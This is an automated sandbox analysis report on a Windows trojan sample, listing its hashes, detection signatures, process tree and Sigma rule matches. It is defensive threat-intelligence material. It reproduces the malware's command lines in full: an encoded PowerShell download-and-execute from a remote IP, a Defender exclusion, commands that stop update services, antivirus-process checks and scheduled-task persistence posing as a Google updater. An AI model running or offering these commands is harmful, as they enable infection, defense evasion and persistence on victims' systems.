Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hfi47s4wOT.exe

Overview

General Information

Sample name:hfi47s4wOT.exe
renamed because original name is a hash value
Original sample name:b74b4dc696daa20dccd7f743c8c1e1a2.exe
Analysis ID:1483258
MD5:b74b4dc696daa20dccd7f743c8c1e1a2
SHA1:45d575a6f69cc184b9b15785504b962b5ef041a5
SHA256:585d0e01d18cf7acfb8cb1b7ba54ffbb64e187e0a69372e2dc7f6f6b285a8493
Tags:32exetrojan
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Sigma detected: Stop multiple services
Yara detected AntiVM3
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found stalling execution ending in API Sleep call
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Stops critical windows services
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • hfi47s4wOT.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\hfi47s4wOT.exe" MD5: B74B4DC696DAA20DCCD7F743C8C1E1A2)
    • cmd.exe (PID: 7516 cmdline: "C:\Windows\System32\cmd.exe" /k move Returning Returning.cmd & Returning.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7568 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7576 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7612 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7620 cmdline: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7656 cmdline: cmd /c md 287175 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7672 cmdline: findstr /V "COALITIONFIBERRELPASTE" Gays MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7688 cmdline: cmd /c copy /b Yoga + Sail 287175\B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Surrey.pif (PID: 7704 cmdline: Surrey.pif B MD5: 848164D084384C49937F99D5B894253E)
        • cmd.exe (PID: 7740 cmdline: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7788 cmdline: schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • schtasks.exe (PID: 7804 cmdline: schtasks.exe /create /tn "MindZenithPro" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 8156 cmdline: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Update.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\Temp\Update.exe" MD5: 83D24C959DB31E8275643ED7DE230825)
              • Update.exe (PID: 5344 cmdline: "C:\Users\user\AppData\Local\Temp\Update.exe" MD5: 83D24C959DB31E8275643ED7DE230825)
                • tmp11jjwww2.exe (PID: 732 cmdline: "C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe" MD5: C84101CF9E883A329337A3BA6BC74733)
                  • dialer.exe (PID: 368 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
                    • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • RegAsm.exe (PID: 7824 cmdline: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • powershell.exe (PID: 7932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Update.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\Temp\Update.exe" MD5: 83D24C959DB31E8275643ED7DE230825)
              • Update.exe (PID: 1720 cmdline: "C:\Users\user\AppData\Local\Temp\Update.exe" MD5: 83D24C959DB31E8275643ED7DE230825)
                • tmpgtnhdrk0.exe (PID: 2860 cmdline: "C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe" MD5: C84101CF9E883A329337A3BA6BC74733)
                  • dialer.exe (PID: 2436 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
                    • powershell.exe (PID: 5560 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7720 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7848 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • MindZenithPro.pif (PID: 7928 cmdline: "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g" MD5: 848164D084384C49937F99D5B894253E)
  • wscript.exe (PID: 7860 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • MindZenithPro.pif (PID: 7936 cmdline: "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g" MD5: 848164D084384C49937F99D5B894253E)
  • powershell.exe (PID: 7520 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7236 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8056 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3396 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5688 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8044 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 1016 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5184 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 5848 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1136 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3808 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5376 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 1716 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3284 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • powershell.exe (PID: 4464 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2504JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 2504JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      Process Memory Space: powershell.exe PID: 7932JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi32_2504.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi32_7932.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Sigma Signatures

            Operating System Destruction

            barindex
            Sigma detected: Stop multiple services
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 8056, ProcessName: cmd.exe

            System Summary

            barindex
            Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
            Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ParentCommandLine: Surrey.pif B, ParentImage: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, ParentProcessId: 7704, ParentProcessName: Surrey.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ProcessId: 8156, ProcessName: RegAsm.exe
            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Surrey.pif B, ParentImage: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, ParentProcessId: 7704, ParentProcessName: Surrey.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 7740, ProcessName: cmd.exe
            Sigma detected: Invoke-Obfuscation VAR+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Surrey.pif B, ParentImage: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, ParentProcessId: 7704, ParentProcessName: Surrey.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 7740, ProcessName: cmd.exe
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7520, ProcessName: powershell.exe
            Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7740, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 7788, ProcessName: schtasks.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js", ProcessId: 7848, ProcessName: wscript.exe
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Surrey.pif B, CommandLine: Surrey.pif B, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Returning Returning.cmd & Returning.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: Surrey.pif B, ProcessId: 7704, ProcessName: Surrey.pif
            Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ParentCommandLine: Surrey.pif B, ParentImage: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, ParentProcessId: 7704, ParentProcessName: Surrey.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ProcessId: 8156, ProcessName: RegAsm.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7520, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "MindZenithPro" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "MindZenithPro" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Surrey.pif B, ParentImage: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif, ParentProcessId: 7704, ParentProcessName: Surrey.pif, ProcessCommandLine: schtasks.exe /create /tn "MindZenithPro" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 7804, 